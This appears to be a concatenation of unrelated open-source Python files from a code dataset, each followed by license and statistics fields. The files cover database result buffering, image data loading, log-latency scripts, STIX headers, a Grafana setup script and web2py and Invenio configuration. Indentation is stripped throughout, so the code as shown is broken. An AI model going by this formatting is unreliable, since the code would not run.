"""Fetch the first column of the first row, and close the result set.
Returns None if no row is present.
"""
row = self.first()
if row is not None:
return row[0]
else:
return None
class BufferedRowResultProxy(ResultProxy):
"""A ResultProxy with row buffering behavior.
``ResultProxy`` that buffers the contents of a selection of rows
before ``fetchone()`` is called. This is to allow the results of
``cursor.description`` to be available immediately, when
interfacing with a DB-API that requires rows to be consumed before
this information is available (currently psycopg2, when used with
server-side cursors).
The pre-fetching behavior fetches only one row initially, and then
grows its buffer size by a fixed amount with each successive need
    for additional rows up to a size of 1000.
"""
def _init_metadata(self):
self.__buffer_rows()
super(BufferedRowResultProxy, self)._init_metadata()
# this is a "growth chart" for the buffering of rows.
# each successive __buffer_rows call will use the next
# value in the list for the buffer size until the max
# is reached
size_growth = {
1: 5,
5: 10,
10: 20,
20: 50,
50: 100,
100: 250,
250: 500,
500: 1000
}
def __buffer_rows(self):
size = getattr(self, '_bufsize', 1)
self.__rowbuffer = collections.deque(self.cursor.fetchmany(size))
self._bufsize = self.size_growth.get(size, size)
def _fetchone_impl(self):
if self.closed:
return None
if not self.__rowbuffer:
self.__buffer_rows()
if not self.__rowbuffer:
return None
return self.__rowbuffer.popleft()
def _fetchmany_impl(self, size=None):
if size is None:
return self._fetchall_impl()
result = []
for x in range(0, size):
row = self._fetchone_impl()
if row is None:
break
result.append(row)
return result
def _fetchall_impl(self):
self.__rowbuffer.extend(self.cursor.fetchall())
ret = self.__rowbuffer
self.__rowbuffer = collections.deque()
return ret
class FullyBufferedResultProxy(ResultProxy):
"""A result proxy that buffers rows fully upon creation.
Used for operations where a result is to be delivered
after the database conversation can not be continued,
such as MSSQL INSERT...OUTPUT after an autocommit.
"""
def _init_metadata(self):
super(FullyBufferedResultProxy, self)._init_metadata()
self.__rowbuffer = self._buffer_rows()
def _buffer_rows(self):
return collections.deque(self.cursor.fetchall())
def _fetchone_impl(self):
if self.__rowbuffer:
return self.__rowbuffer.popleft()
else:
return None
def _fetchmany_impl(self, size=None):
if size is None:
return self._fetchall_impl()
result = []
for x in range(0, size):
row = self._fetchone_impl()
if row is None:
break
result.append(row)
return result
def _fetchall_impl(self):
ret = self.__rowbuffer
self.__rowbuffer = collections.deque()
return ret
class BufferedColumnRow(RowProxy):
def __init__(self, parent, row, processors, keymap):
# preprocess row
row = list(row)
# this is a tad faster than using enumerate
index = 0
for processor in parent._orig_processors:
if processor is not None:
row[index] = processor(row[index])
index += 1
row = tuple(row)
super(BufferedColumnRow, self).__init__(parent, row,
processors, keymap)
class BufferedColumnResultProxy(ResultProxy):
"""A ResultProxy with column buffering behavior.
``ResultProxy`` that loads all columns into memory each time
fetchone() is called. If fetchmany() or fetchall() are called,
the full grid of results is fetched. This is to operate with
databases where result rows contain "live" results that fall out
of scope unless explicitly fetched. Currently this includes
cx_Oracle LOB objects.
"""
_process_row = BufferedColumnRow
def _init_metadata(self):
super(BufferedColumnResultProxy, self)._init_metadata()
metadata = self._metadata
# orig_processors will be used to preprocess each row when they are
# constructed.
metadata._orig_processors = metadata._processors
# replace the all type processors by None processors.
metadata._processors = [None for _ in range(len(metadata.keys))]
keymap = {}
for k, (func, obj, index) in metadata._keymap.items():
keymap[k] = (None, obj, index)
self._metadata._keymap = keymap
def fetchall(self):
# can't call cursor.fetchall(), since rows must be
# fully processed before requesting more from the DBAPI.
l = []
while True:
row = self.fetchone()
if row is None:
break
l.append(row)
return l
def fetchmany(self, size=None):
# can't call cursor.fetchmany(), since rows must be
# fully processed before requesting more from the DBAPI.
if size is None:
return self.fetchall()
l = []
for i in range(size):
row = self.fetchone()
if row is None:
break
l.append(row)
return l
|
mit
| 7,757,144,335,151,465,000
| 33.582133
| 84
| 0.566028
| false
| 4.828974
| false
| false
| false
|
atitus5/MiniPlaces
|
DataLoader_multi.py
|
1
|
9187
|
import os
import numpy as np
import scipy.misc
import h5py
import random
np.random.seed(123)
# loading data from .h5
class DataLoaderH5(object):
def __init__(self, **kwargs):
self.load_size = int(kwargs['load_size'])
self.fine_size = int(kwargs['fine_size'])
self.data_mean = np.array(kwargs['data_mean'])
self.randomize = kwargs['randomize']
# read data info from lists
f = h5py.File(kwargs['data_h5'], "r")
self.im_set = np.array(f['images'])
self.lab_set = np.array(f['labels'])
self.num = self.im_set.shape[0]
assert self.im_set.shape[0]==self.lab_set.shape[0], '#images and #labels do not match!'
assert self.im_set.shape[2]==self.load_size, 'Image size error!'
assert self.im_set.shape[1]==self.load_size, 'Image size error!'
print('# Images found:', self.num)
print("Shuffling...")
if self.randomize:
self.shuffle()
self._idx = 0
print("DataLoader ready.")
def next_batch_all(self, batch_size):
labels_batch = np.zeros(batch_size*9)
images_batch = np.zeros((batch_size*9, self.fine_size, self.fine_size, 3))
for i in range(batch_size):
image = self.im_set[self._idx]
image = image.astype(np.float32)/255. - self.data_mean
resize_factor = np.random.random_integers(self.load_size, self.load_size*2)
image_1 = scipy.misc.imresize(image, (resize_factor, resize_factor))
image_1 = image_1.astype(np.float32)/255. - self.data_mean
for loc_i in range(3):
flip = np.random.random_integers(0, 1)
if flip>0:
image_1 = image_1[:,::-1,:]
offset_h = np.random.random_integers(0, image_1.shape[0]-self.fine_size)
offset_w = np.random.random_integers(0, image_1.shape[1]-self.fine_size)
images_batch[9*i+loc_i, ...] = image_1[offset_h:offset_h+self.fine_size, offset_w:offset_w+self.fine_size, :]
labels_batch[9*i+loc_i, ...] = self.lab_set[self._idx]
resize_factor = np.random.random_integers(self.fine_size, self.load_size)
image_2 = scipy.misc.imresize(image, (resize_factor, resize_factor))
image_2 = image_2.astype(np.float32)/255. - self.data_mean
for loc_i in range(3):
flip = np.random.random_integers(0, 1)
if flip>0:
image_2 = image_2[:,::-1,:]
offset_h = np.random.random_integers(0, image_2.shape[0]-self.fine_size)
offset_w = np.random.random_integers(0, image_2.shape[1]-self.fine_size)
images_batch[3+9*i+loc_i, ...] = image_2[offset_h:offset_h+self.fine_size, offset_w:offset_w+self.fine_size, :]
labels_batch[3+9*i+loc_i, ...] = self.lab_set[self._idx]
for loc_i in range(3):
flip = np.random.random_integers(0, 1)
if flip>0:
image = image[:,::-1,:]
offset_h = np.random.random_integers(0, image.shape[0]-self.fine_size)
offset_w = np.random.random_integers(0, image.shape[1]-self.fine_size)
images_batch[6+9*i+loc_i, ...] = image[offset_h:offset_h+self.fine_size, offset_w:offset_w+self.fine_size, :]
labels_batch[6+9*i+loc_i, ...] = self.lab_set[self._idx]
self._idx += 1
if self._idx == self.num:
self._idx = 0
if self.randomize:
self.shuffle()
return images_batch, labels_batch
def next_batch_sample(self, batch_size):
labels_batch = np.zeros(batch_size)
images_batch = np.zeros((batch_size, self.fine_size, self.fine_size, 3))
for i in range(batch_size):
image = self.im_set[self._idx]
image = image.astype(np.float32)/255. - self.data_mean
resize_factor = np.random.random_integers(self.load_size, self.load_size*2)
images_labels = []
image_1 = scipy.misc.imresize(image, (resize_factor, resize_factor))
image_1 = image_1.astype(np.float32)/255. - self.data_mean
for loc_i in range(3):
flip = np.random.random_integers(0, 1)
if flip>0:
image_1 = image_1[:,::-1,:]
offset_h = np.random.random_integers(0, image_1.shape[0]-self.fine_size)
offset_w = np.random.random_integers(0, image_1.shape[1]-self.fine_size)
images_labels.append((image_1[offset_h:offset_h+self.fine_size, offset_w:offset_w+self.fine_size, :],self.lab_set[self._idx]))
resize_factor = np.random.random_integers(self.fine_size, self.load_size)
image_2 = scipy.misc.imresize(image, (resize_factor, resize_factor))
image_2 = image_2.astype(np.float32)/255. - self.data_mean
for loc_i in range(3):
flip = np.random.random_integers(0, 1)
if flip>0:
image_2 = image_2[:,::-1,:]
offset_h = np.random.random_integers(0, image_2.shape[0]-self.fine_size)
offset_w = np.random.random_integers(0, image_2.shape[1]-self.fine_size)
images_labels.append((image_2[offset_h:offset_h+self.fine_size, offset_w:offset_w+self.fine_size, :],self.lab_set[self._idx]))
for loc_i in range(3):
flip = np.random.random_integers(0, 1)
if flip>0:
image = image[:,::-1,:]
offset_h = np.random.random_integers(0, image.shape[0]-self.fine_size)
offset_w = np.random.random_integers(0, image.shape[1]-self.fine_size)
images_labels.append((image[offset_h:offset_h+self.fine_size, offset_w:offset_w+self.fine_size, :],self.lab_set[self._idx]))
choice = random.choice(images_labels)
images_batch[i, ...] = choice[0]
labels_batch[i, ...] = choice[1]
self._idx += 1
if self._idx == self.num:
self._idx = 0
if self.randomize:
self.shuffle()
return images_batch, labels_batch
def size(self):
return self.num
def reset(self):
self._idx = 0
def shuffle(self):
perm = np.random.permutation(self.num)
self.im_set = self.im_set[perm]
self.lab_set = self.lab_set[perm]
# Loading data from disk
class DataLoaderDisk(object):
def __init__(self, **kwargs):
self.load_size = int(kwargs['load_size'])
self.fine_size = int(kwargs['fine_size'])
self.data_mean = np.array(kwargs['data_mean'])
self.randomize = kwargs['randomize']
self.data_root = os.path.join(kwargs['data_root'])
# read data info from lists
self.list_im = []
self.list_lab = []
with open(kwargs['data_list'], 'r') as f:
for line in f:
path, lab =line.rstrip().split(' ')
self.list_im.append(os.path.join(self.data_root, path))
self.list_lab.append(int(lab))
self.list_im = np.array(self.list_im, np.object)
self.list_lab = np.array(self.list_lab, np.int64)
self.num = self.list_im.shape[0]
print('# Images found:', self.num)
# permutation
perm = np.random.permutation(self.num)
self.list_im[:, ...] = self.list_im[perm, ...]
self.list_lab[:] = self.list_lab[perm, ...]
self._idx = 0
def next_batch(self, batch_size):
images_batch = np.zeros((batch_size, self.fine_size, self.fine_size, 3))
labels_batch = np.zeros(batch_size)
for i in range(batch_size):
image = scipy.misc.imread(self.list_im[self._idx])
image = scipy.misc.imresize(image, (self.load_size, self.load_size))
image = image.astype(np.float32)/255.
image = image - self.data_mean
if self.randomize:
flip = np.random.random_integers(0, 1)
if flip>0:
image = image[:,::-1,:]
offset_h = np.random.random_integers(0, self.load_size-self.fine_size)
offset_w = np.random.random_integers(0, self.load_size-self.fine_size)
else:
offset_h = (self.load_size-self.fine_size)//2
offset_w = (self.load_size-self.fine_size)//2
images_batch[i, ...] = image[offset_h:offset_h+self.fine_size, offset_w:offset_w+self.fine_size, :]
labels_batch[i, ...] = self.list_lab[self._idx]
self._idx += 1
if self._idx == self.num:
self._idx = 0
return images_batch, labels_batch
def size(self):
return self.num
def reset(self):
self._idx = 0
|
mit
| 7,697,863,647,594,161,000
| 40.949772
| 142
| 0.534669
| false
| 3.411437
| false
| false
| false
|
khosrow/metpx
|
sundew/lib/PDSLatencies.py
|
1
|
7398
|
#!/usr/bin/env python
"""
MetPX Copyright (C) 2004-2006 Environment Canada
MetPX comes with ABSOLUTELY NO WARRANTY; For details type see the file
named COPYING in the root of the source directory tree.
"""
"""
#############################################################################################
# Name: PDSLatencies
#
# Author: Daniel Lemay
#
# Date: 2005-09-13
#
# Description: Calculate latencies for a product (MPCN for example) sent to
# a PDS client (wxo-b1 for example)
#
#############################################################################################
"""
import sys, os, os.path, commands, fnmatch
import PXPaths, dateLib
from Latencies import Latencies
class PDSLatencies(Latencies):
def __init__(self, nopull=False, keep=False, date=None, pattern='ACC', machines=['pds1', 'pds2', 'pds3', 'pds4'], sources=['pdschkprod'], client='wxo-b1-oper-ww', xstats=False):
Latencies.__init__(self, nopull, keep, date, xstats) # Parent Constructor
self.pattern = pattern # Products that we want to match
self.machines = machines # Machines were the logs can be found
self.sources = sources # Sources for which we will check arrival time of the products
self.client = client # Client for which we will check delivery time of the products (ONLY ONE ENTRY in the list)
self.system = 'PDS'
if not self.nopull:
self.obtainFiles()
self.start()
if not self.keep:
self.eraseFiles()
def obtainFiles(self):
date = self.date
# Used for xferlog
(dummy, month, day) = dateLib.getISODateParts(date)
if day[0] == '0':
day = ' ' + day[1]
monthAbbrev = dateLib.getMonthAbbrev(month)
LOG = '/apps/pds/log/'
for machine in self.machines:
self.manager.createDir(PXPaths.LAT_TMP + machine + '_' + self.random)
for source in self.sources:
command = 'scp -q %s:%s %s' % (machine, LOG + source + '.' + date, PXPaths.LAT_TMP + machine + '_' + self.random)
(status, output) = commands.getstatusoutput(command)
command = 'scp -q %s:%s %s' % (machine, LOG + self.client + '.' + date, PXPaths.LAT_TMP + machine + '_' + self.random)
(status, output) = commands.getstatusoutput(command)
# xferlog data
if self.xstats:
command = "ssh %s grep -h -e \"'%s %s'\" /var/log/xferlog /var/log/xferlog.?" % (machine, monthAbbrev, day)
(status, output) = commands.getstatusoutput(command)
xferlog = open(PXPaths.LAT_TMP + machine + '_' + self.random + '/xferlog_paplat', 'w')
xferlog.write(output)
xferlog.close()
def extractGoodLines(self, prefix, good):
date = self.date
for machine in self.machines:
hostOnly = machine.split('.')[0]
lines = []
xferlogLines = []
dirPath = PXPaths.LAT_TMP + machine + '_' + self.random
try:
files = os.listdir(dirPath)
except OSError:
print "%s doesn't exist!\nDon't use -n|--nopull option if you don't have some data." % dirPath
sys.exit(1)
if prefix == 'rx':
for file in [x for x in files if x == 'pdschkprod.%s' % (date)]:
lines.extend(open(dirPath + '/' + file).readlines())
if self.xstats:
for file in [x for x in files if x == 'xferlog_paplat']:
xferlogLines.extend(open(dirPath + '/' + file).readlines())
if self.pattern == '__ALL__':
good.extend(map(lambda x: (x, hostOnly), fnmatch.filter(lines, '*Written*')))
if self.xstats:
self.goodXferlog.extend(map(lambda x: (x, hostOnly), xferlogLines))
else:
good.extend(map(lambda x: (x, hostOnly), fnmatch.filter(lines, '*Written*%s*' % (self.pattern))))
if self.xstats:
self.goodXferlog.extend(map(lambda x: (x, hostOnly), fnmatch.filter(xferlogLines, '*%s*' % (self.pattern))))
if prefix == 'tx':
for file in [x for x in files if x == '%s.%s' % (self.client, date)]:
lines.extend(open(dirPath + '/' + file).readlines())
if self.pattern == '__ALL__':
good.extend(map(lambda x: (x, hostOnly), fnmatch.filter(lines, 'INFO*sent to*')))
else:
good.extend(map(lambda x: (x, hostOnly), fnmatch.filter(lines, 'INFO*%s*sent to*' % (self.pattern))))
def extractInfos(self, prefix, good, infos):
if prefix == 'rx':
#print("GOOD RX: %i" % len(good))
for (line, machine) in good:
parts = line.split()
hhmmss = parts[3][:-1]
date = '%s %s' % (self.dateDashed, hhmmss)
if self.xstats:
# Remove ::20050918000030
filename_parts = os.path.split(parts[9])[1].split(':')
filename = ':'.join(filename_parts[:-2])
else:
filename = os.path.split(parts[9])[1]
#print (date, dateLib.getSecondsSinceEpoch(date), filename, machine)
infos[filename] = (date, dateLib.getSecondsSinceEpoch(date), machine)
#print len(infos)
self.goodRx = []
# xferlog stuff
for (line, machine) in self.goodXferlog:
parts = line.split()
hhmmss = parts[3]
date = '%s %s' % (self.dateDashed, hhmmss)
filename = os.path.split(parts[8])[1]
#print (date, dateLib.getSecondsSinceEpoch(date), filename, machine)
self.xferlogInfos[filename] = (date, dateLib.getSecondsSinceEpoch(date), machine)
self.goodXferlog = []
if prefix == 'tx':
#print("GOOD TX: %i" % len(good))
for (line, machine) in good:
parts = line.split()
hhmmss = parts[3][:-1]
date = '%s %s' % (self.dateDashed, hhmmss)
if self.xstats:
# Remove ::20050918020123:pds4
filename_parts = parts[7].split(':')
filename = ':'.join(filename_parts[:-3])
else:
# Only remove machine name
filename_parts = parts[7].split(':')
filename = ':'.join(filename_parts[:-1])
#print (date, dateLib.getSecondsSinceEpoch(date), filename, machine)
infos[filename] = (date, dateLib.getSecondsSinceEpoch(date), machine)
#print len(infos)
self.goodTx = []
"""
print "*************************************** RX ********************************"
for tuple in self.goodRx:
print (tuple[0].strip(), tuple[1])
print "*************************************** TX ********************************"
for tuple in self.goodTx:
print (tuple[0].strip(), tuple[1])
"""
if __name__ == '__main__':
latencier = PDSLatencies()
|
gpl-2.0
| -795,901,474,159,940,700
| 42.011628
| 181
| 0.499594
| false
| 3.895735
| false
| false
| false
|
CodeYellowBV/django-binder
|
tests/test_set_nullable_relation.py
|
1
|
2202
|
from binder.exceptions import BinderValidationError
from binder.router import Router
from binder.views import ModelView
from .testapp.views import AnimalView
from .testapp.models import Animal, Caretaker
from django.test import TestCase
class TestSetNullableRelations(TestCase):
def test_standard_filling_in_relation_to_existing_model(self):
animal = Animal.objects.create(name='foo')
caretaker = Caretaker.objects.create(name='bar')
animal_view = AnimalView()
class FakeUser:
def has_perm(self, perm):
return True
class FakeRequest:
user = FakeUser()
GET = {}
router = Router()
router.register(AnimalView)
animal_view.router = router
animal_view._store(animal, {'caretaker': caretaker.pk}, FakeRequest())
self.assertEqual(animal.caretaker, caretaker)
    def test_filling_in_relation_to_existing_model_after_evaluation(self):
animal = Animal.objects.create(name='foo')
caretaker = Caretaker.objects.create(name='bar')
animal_view = AnimalView()
class FakeUser:
def has_perm(self, perm):
return True
class FakeRequest:
user = FakeUser()
GET = {}
router = Router()
router.register(AnimalView)
animal_view.router = router
assert animal.caretaker is None
animal_view._store(animal, {'caretaker': caretaker.pk}, FakeRequest())
self.assertEqual(animal.caretaker, caretaker)
def test_setting_none_existing_caretaker_gives_validation_error(self):
animal = Animal.objects.create(name='foo', caretaker=Caretaker.objects.create(name='bar2'))
animal_view = AnimalView()
class FakeUser:
def has_perm(self, perm):
return True
class FakeRequest:
user = FakeUser()
GET = {}
router = Router()
router.register(AnimalView)
animal_view.router = router
animal.caretaker
with self.assertRaises(BinderValidationError):
animal_view._store(animal, {'caretaker': -1}, FakeRequest())
|
mit
| 7,358,221,550,644,352,000
| 26.185185
| 99
| 0.624886
| false
| 3.890459
| true
| false
| false
|
STIXProject/python-stix
|
stix/core/stix_header.py
|
1
|
5004
|
# Copyright (c) 2017, The MITRE Corporation. All rights reserved.
# See LICENSE.txt for complete terms.
from mixbox import fields
import stix
from stix.utils import deprecated
from stix.common import InformationSource, StructuredTextList, Profiles
from stix.common.vocabs import VocabField, PackageIntent
from stix.data_marking import Marking
import stix.bindings.stix_core as stix_core_binding
class STIXHeader(stix.Entity):
"""The STIX Package Header.
Args:
handling: The data marking section of the Header.
information_source: The :class:`.InformationSource` section of the
Header.
package_intents: **DEPRECATED**. A collection of :class:`.VocabString`
defining the intent of the parent :class:`.STIXPackage`.
description: **DEPRECATED**. A description of the intent or purpose
of the parent :class:`.STIXPackage`.
short_description: **DEPRECATED**. A short description of the intent
or purpose of the parent :class:`.STIXPackage`.
title: **DEPRECATED**. The title of the :class:`.STIXPackage`.
Attributes:
profiles: A collection of STIX Profiles the parent
:class:`.STIXPackage` conforms to.
title: **DEPRECATED**. The title of the parent :class:`.STIXPackage`.
"""
_binding = stix_core_binding
_binding_class = _binding.STIXHeaderType
_namespace = 'http://stix.mitre.org/stix-1'
title = fields.TypedField("Title", preset_hook=deprecated.field)
package_intents = VocabField("Package_Intent", PackageIntent, multiple=True, preset_hook=deprecated.field)
descriptions = fields.TypedField("Description", type_=StructuredTextList, preset_hook=deprecated.field)
short_descriptions = fields.TypedField("Short_Description", type_=StructuredTextList, preset_hook=deprecated.field)
handling = fields.TypedField("Handling", Marking)
information_source = fields.TypedField("Information_Source", InformationSource)
profiles = fields.TypedField("Profiles", Profiles)
def __init__(self, package_intents=None, description=None, handling=None,
information_source=None, title=None, short_description=None):
super(STIXHeader, self).__init__()
self.package_intents = package_intents
self.title = title
self.description = StructuredTextList(description)
self.short_description = StructuredTextList(short_description)
self.handling = handling
self.information_source = information_source
self.profiles = None
@property
def description(self):
"""**DEPRECATED**. A single description about the contents or
purpose of this object.
Default Value: ``None``
Note:
If this object has more than one description set, this will return
the description with the lowest ordinality value.
Returns:
An instance of
:class:`.StructuredText`
"""
return next(iter(self.descriptions), None)
@description.setter
def description(self, value):
self.descriptions = StructuredTextList(value)
def add_description(self, description):
"""**DEPRECATED**. Adds a description to the ``descriptions``
collection.
This is the same as calling "foo.descriptions.add(bar)".
"""
deprecated.warn(description)
self.descriptions.add(description)
@property
def short_description(self):
"""**DEPRECATED**. A single short description about the contents or
purpose of this object.
Default Value: ``None``
Note:
If this object has more than one short description set, this will
return the description with the lowest ordinality value.
Returns:
An instance of :class:`.StructuredText`
"""
return next(iter(self.short_descriptions), None)
@short_description.setter
def short_description(self, value):
self.short_descriptions = StructuredTextList(value)
def add_short_description(self, description):
"""**DEPRECATED**. Adds a description to the ``short_descriptions``
collection.
This is the same as calling "foo.short_descriptions.add(bar)".
"""
deprecated.warn(description)
self.short_descriptions.add(description)
def add_package_intent(self, package_intent):
"""**DEPRECATED**. Adds :class:`.VocabString` object to the
:attr:`package_intents` collection.
If the input is not an instance of :class:`.VocabString`, an effort
will be made to convert it into an instance of :class:`.PackageIntent`.
"""
deprecated.warn(package_intent)
self.package_intents.append(package_intent)
def add_profile(self, profile):
"""Adds a profile to the STIX Header. A Profile is represented by a
string URI.
"""
self.profiles.append(profile)
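# A minimal usage sketch, assuming python-stix and its dependencies are
# installed; the deprecated ``title``/``description`` arguments are used here
# purely for illustration.
if __name__ == '__main__':
    header = STIXHeader(title="Example package", description="A short demo header")
    print(header.title)
    print(header.description.value if header.description else None)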
|
bsd-3-clause
| 8,210,940,760,186,117,000
| 34.489362
| 119
| 0.666267
| false
| 4.381786
| false
| false
| false
|
moio/sumaform
|
salt/grafana/setup_grafana.py
|
1
|
1107
|
#!/usr/bin/env python
import base64
import errno
import httplib
import json
import socket
import sys
import time
def do(method, connection, headers, path, body=None):
connection.request(method, path, headers=headers, body=json.dumps(body))
resp = connection.getresponse()
content = resp.read()
if resp.status != 200:
raise IOError("Unexpected HTTP status received on %s: %d" % (path, resp.status))
return json.loads(content)
connection = httplib.HTTPConnection("localhost")
# try to connect, multiple times if ECONNREFUSED is raised
# (service is up but not ready for requests yet)
for retries in range(0,10):
try:
        connection.connect()
        break  # connected successfully, stop retrying
except socket.error as e:
if e.errno != errno.ECONNREFUSED:
raise e
print("Connection refused, retrying...")
time.sleep(1)
token = base64.b64encode("admin:admin".encode("ASCII")).decode("ascii")
headers = {
"Authorization" : "Basic %s" % token,
"Content-Type" : "application/json; charset=utf8"
}
do("PUT", connection, headers, "/api/org/preferences", {"homeDashboardId" : 1})
|
bsd-3-clause
| 7,001,299,087,362,661,000
| 26
| 88
| 0.68112
| false
| 3.629508
| false
| false
| false
|
RysavyD/platby
|
models/db_model.py
|
1
|
5519
|
# coding: utf8
import locale
from mz_wkasa_platby import fix_login, Uc_sa
# Uc_sa - ids of the chart-of-accounts accounts; importing it here makes it visible to controllers and views
locale.setlocale(locale.LC_ALL, 'cs_CZ.UTF-8')
class IS_IN_DB_(IS_IN_DB):
def build_set(self):
super(IS_IN_DB_, self).build_set()
records = [(lbl, self.theset[pos]) for pos, lbl in enumerate(self.labels)]
records.sort(key=lambda x: locale.strxfrm(x[0]))
self.labels = [rec[0] for rec in records]
self.theset = [rec[1] for rec in records]
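# Illustration: IS_IN_DB_ is a drop-in replacement for IS_IN_DB that sorts the
# option labels using the Czech locale configured above, e.g.
#
#     requires=IS_EMPTY_OR(IS_IN_DB_(db, db.auth_user.id, '%(nick)s - %(vs)s'))
#
# as used for pohyb.idauth_user below.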
db.define_table('ucet',
Field('ucet', length=7),
Field('zkratka', length=3),
Field('nazev', length=100),
format='%(ucet)s - %(nazev)s'
)
db.define_table('kategorie',
Field('idma_dati', db.ucet),
Field('iddal', db.ucet),
Field('vyznam', default=''),
format='%(vyznam)s'
)
db.define_table('typp',
Field('zkratka', length=1),
Field('vyznam', length=40),
format='%(vyznam)s'
)
db.define_table('partner',
Field('idx', 'integer'), # foxpro id
Field('typp_id', db.typp),
Field('ucel', length=40),
Field('nazev', length=60),
Field('ulice', length=40),
Field('psc', length=5),
Field('misto', length=40),
Field('ico', length=10),
Field('kontakt', 'text'),
Field('poznamka', 'text'),
format='%(nazev)s, %(misto)s'
)
db.define_table('fp',
Field('idx', 'integer'), # foxpro id
Field('zauctovana', 'boolean', default=False),
Field('md', db.ucet, label=TFu('nákladový účet 5..'),
comment=TFu('pro zaúčtování faktury [MD=5..,Dal=321], pokud ještě nebylo provedeno')),
Field('partner_id', db.partner, ondelete='SETNULL',),
Field('ucet', length=20),
Field('elektronicky', 'boolean', default=True),
Field('castka', 'decimal(11,2)', default=0.00),
Field('zaloha', 'decimal(11,2)', default=0.00),
Field('no_jejich', length=20),
Field('vystaveno', 'date'),
Field('prijato', 'date'),
Field('splatnost', 'date'),
Field('uhrazeno', 'date'),
Field('zal_uhrazeno', 'date'),
Field('datum_akce', 'date'),
Field('uhrada', length=1),
Field('zal_uhrada', length=1),
Field('vs', length=10),
Field('ss', length=10),
Field('ks', length=4),
Field('vs_akce', length=5),
Field('popis', length=90),
Field('poznamka', 'text'),
format='%(vystaveno)s, %(castka)s, %(no_jejich)s'
)
db.define_table('pohyb',
Field('idauth_user', 'reference auth_user', label=TFu("Uživatel"),
requires=IS_EMPTY_OR(IS_IN_DB_(db, db.auth_user.id, '%(nick)s - %(vs)s'))),
Field('idorganizator', 'reference auth_user', label=TFu("Zadal organizátor"),
readable=False, writable=False,
requires=IS_EMPTY_OR(IS_IN_DB(db, db.auth_user.id, '%(nick)s - %(vs)s'))),
Field('idma_dati', 'reference ucet'),
Field('iddal', 'reference ucet'),
Field('fp_id', db.fp,
requires=IS_EMPTY_OR(IS_IN_DB(db, db.fp.id, db.fp._format)),
represent=lambda id, r=None: db.fp._format % db.fp(id) if id else '',
ondelete='SETNULL',
),
Field('partner_id', db.partner,
requires=IS_EMPTY_OR(IS_IN_DB(db, db.partner.id, db.partner._format)),
represent=lambda id, r=None: db.partner._format % db.partner(id) if id else '',
ondelete='SETNULL',
),
Field('datum', 'datetime',
requires=[IS_NOT_EMPTY(), IS_DATETIME(format=TFu('%d.%m.%Y'))]),
Field('castka', 'decimal(11,2)'),
Field('popis', 'text'),
Field('cislo_uctu', length=30),
Field('kod_banky', length=10),
Field('nazev_banky', length=40),
Field('zakaznik', length=10),
Field('vs', length=10, default=''),
Field('ss', length=10, default=''),
Field('ks', length=4, default=''),
Field('id_pohybu', length=12),
Field('id_pokynu', length=12),
)
db.define_table('systab',
Field('kod', length=12),
Field('hodnota', length=100),
)
db.define_table('loginlog',
Field('idauth_user', 'reference auth_user'),
Field('datum', 'date'),
)
db.define_table('zadost',
Field('zadost', 'datetime', label="Datum žádosti"),
Field('idauth_user', 'reference auth_user', label="Uživatel"),
Field('vyridil_id', 'reference auth_user', label="Vyřídil"),
Field('vs', length=10, label="Symbol",
comment="symbol uživatele"),
Field('ss', length=10, label="Symbol obsol",
comment=""),
Field('typ', 'integer', label='Typ žádosti',
comment='1 sa->wKasa, 2->na BÚ, 3 členství, 4 refundace'),
Field('cislo_uctu', length=30, label='Číslo účtu'),
Field('kod_banky', length=10, label='Kód banky'),
Field('popis', 'text'),
Field('prevod', 'datetime', label='Datum vyřízení'),
Field('zadano', 'decimal(11,2)', label='Žádaná částka'),
Field('prevedeno', 'decimal(11,2)', label='Převedená částka'),
)
db.define_table('clenstvi',
Field('user_id', 'reference auth_user', label="Uživatel"),
Field('group_id', 'reference auth_group', label="Role ve sdružení"),
Field('ode_dne', 'date', label="Ode dne"),
Field('do_dne', 'date', label="Do dne"),
)
fix_login(db, auth, vs_default) # give every user a personal symbol, log logins
## after defining tables, uncomment below to enable auditing
# auth.enable_record_versioning(db)
|
agpl-3.0
| -6,709,750,360,438,365,000
| 33.940789
| 94
| 0.581549
| false
| 2.855724
| false
| false
| false
|
MSusik/invenio
|
invenio/base/bundles.py
|
1
|
2885
|
# -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2014 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Base bundles."""
from invenio.ext.assets import Bundle
invenio = Bundle(
"js/invenio.js",
output="invenio.js",
filters="requirejs",
weight=90
)
styles = Bundle(
"css/token-input.css",
"css/token-input-facebook.css",
"css/typeahead.js-bootstrap.css",
"less/base.less",
"css/tags/popover.css",
output="invenio.css",
depends=[
"less/base.less",
"less/base/**/*.less"
],
filters="less,cleancss",
)
# FIXME
#if config.CFG_WEBSTYLE_TEMPLATE_SKIN != "default":
# styles.contents.append("css/" + config.CFG_WEBSTYLE_TEMPLATE_SKIN + ".css")
jquery = Bundle(
"js/jquery.js",
"js/jquery.jeditable.mini.js",
"js/jquery.tokeninput.js",
"js/jquery-caret.js",
"js/typeahead.js",
"js/bootstrap.js",
"js/bootstrap-select.js",
"js/hogan.js",
"js/translate.js",
output="jquery.js",
filters="uglifyjs",
weight=10,
bower={
"jquery": "2.1.0",
"bootstrap": "3.2.0",
"hogan": "3.0.0",
"jquery.jeditable": "http://invenio-software.org/download/jquery/v1.5/js/jquery.jeditable.mini.js",
"jquery.tokeninput": "*"
}
)
# jQuery UI
jqueryui = Bundle(
"js/jqueryui/jquery-ui.custom.js",
"js/jquery-ui-timepicker-addon.js",
filters="uglifyjs",
output="jquery-ui.js",
weight=11,
bower={
"jqueryui": "1.11.0",
"jquery.ui.timepicker": "http://invenoi-software.org/download/jquery/jquery-ui-timepicker-addon-1.0.3.js"
}
)
# if ASSETS_DEBUG and not LESS_RUN_IN_DEBUG
lessjs = Bundle(
"js/less.js",
output="less.js",
filters="uglifyjs",
weight=0,
bower={
"less": "1.7.0"
}
)
# if ASSETS_DEBUG and not REQUIRESJS_RUN_IN_DEBUG
requirejs = Bundle(
"js/require.js",
"js/settings.js",
output="require.js",
filters="uglifyjs",
weight=0,
bower={
"requirejs": "latest"
}
)
# else
almondjs = Bundle(
"js/almond.js",
"js/settings.js",
output="almond.js",
filters="uglifyjs",
